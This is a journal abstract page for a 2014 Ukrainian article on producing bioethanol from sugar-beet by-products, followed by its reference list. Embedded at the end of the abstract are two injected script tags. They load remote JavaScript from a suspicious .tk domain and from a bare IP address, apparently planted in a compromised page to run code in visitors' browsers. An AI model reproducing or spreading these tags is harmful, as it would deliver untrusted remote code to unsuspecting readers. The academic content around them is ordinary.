ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

UDS: 62-631.4(477)
Економіка агропромислового виробництва

Priorities of bioethanol production in Ukraine / Skoruk O.P., Zubar I.V. // Ekonomika APK. - 2014. - № 2 - P. 36

An article considers the current state and studies economic activity indicators of Ukrainian sugar industry during recent years. The basic problems of sugar production are defined. The perspective and economic aspects of use of sideline products as raw materials for biofuel production are studied. It is suggested to provide necessary resources for bioethanol production directly on the sugar plants. It is emphasised that given Ukrainian fuel capacity the production of bioethanol has vast potential, but for the lack of sales market this capacity is realised only for 30%. There are reviewed potential opportunities and the economic result in case of introduction of bioethanol production through use of raw materials of sugar beets subcomplex that can lead to augmentation of the level of competitiveness on the markets of bioethanol and molasses. For use of molasses on the sugar plants can lead to decrease of production capacities of distillery enterprises, the problems of expansion of sales markets and state regulation of biofuel consumption in Ukraine should be solved. Tabl.: 3. Figs.: 1. Refs.: 14.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Key words: bioethanol, sugar beet subcomplex, sugar beet, sideproducts of sugar production, alcohol industry, efficiency, profitability

References

 1. Гевак З.В. Сучасний стан та перспективи розвитку спиртової промисловості / З.В. Гевак // Інноваційна економіка. – 2012. –№ 5. – С. 190-193.
 2. Державна програма активізації розвитку економіки на 2013-2014 роки від 27 лютого 2013 р. № 187. Урядовий портал [Електронний ресурс]. – Режим доступу: http://www.kmu.gov.ua/control/publish/article?art_id=246247059.
 3. Доронін А.В. Ефективність виробництва цукрових буряків та цукру в Україні/ А.В. Доронін // Сталий розвиток економіки. – 2013. –№ 3. – С. 51-55.
 4. Ємцев В. Сучасний стан та проблеми розвитку підприємств спиртової промисловості/ В. Ємцев // Продовольча індустрія АПК. – 2012. – № 2. – С. 4-7.
 5. Месель-Веселяк В.Я. Організаційно-економічне удосконалення роботи цукробурякового підкомплексу України / В.Я. Месель-Веселяк, М.М. Ярчук // Економіка АПК. – 2013.– № 2. – С. 3 – 8.
 6. Роїк М.В. Перспективи розвитку біоенергетики в Україні / М. В. Роїк, В.Л. Курило, М.Я. Гументик, О.М. Ганженко // Цукрові буряки. – 2012. – № 2-3.– С. 6 – 8.
 7. Ярчук М.М. Аналітична інформація про підсумки роботи Національної асоціації цукровиків України в 2012 р. / М.М. Ярчук // Цукровий бізнес в умовах національного та світового ринку: матер. наук.-техніч. конф. цукровиків України.– К. : Цукор України, 2013. – С. 79–100.
 8. Хомічак Л.М. Основні принципи комплексної технології переробки цукрових буряків на цукор та біопалива/ Л.М. Хомічак, С.Т. Олійнічук // Шляхи диверсифікації виробництва продукції на цукрових заводах України: матер. Міжнар. наук.-техніч. конф. цукровиків України, 2013. – С. 78-82.
 9. Шматкова Г.К. Сучасні тенденції у розвитку спиртової та цукрової промисловості України / Г.К. Шматкова, Н.Ю. Губенко / /Цукор України. – 2012. – № 11. – С. 37-38.
 10. Закон України “Про внесення змін до деяких законів України щодо виробництва та використання моторних палив з вмістом біокомпонентів” / Відом. Верхов. Ради (ВВР), 2013. – № 19-20. – Ст.177.
 11. Енергетична стратегія України до 2030 року [Електронний ресурс]. – Режим доступу: http://mpe.kmu.gov.ua/fuel/control/uk/doccatalog/list?currDir=50358.
 12. Андросов А.Л. Промышленные технологии переработки послеспиртовой барды/ А.Л. Андросов, И.А.Елизаров, А.А. Третьяков// Вестник ТГТУ. – 2010. – № 16. – С.954.
 13. Jan Lindstedt Bioethanol production at the European sugar industry/ BioAlcohol Fuel Foundation (BAFF), Sweden, 2009.
 14. Juliane von Bismarck EU ethanol firms seek investigation of U.S. subsidies// Reuters magazine, 2011.
Read article: 14_02_36-41.pdf
Read translation: 1402skoruk_zubar.pdf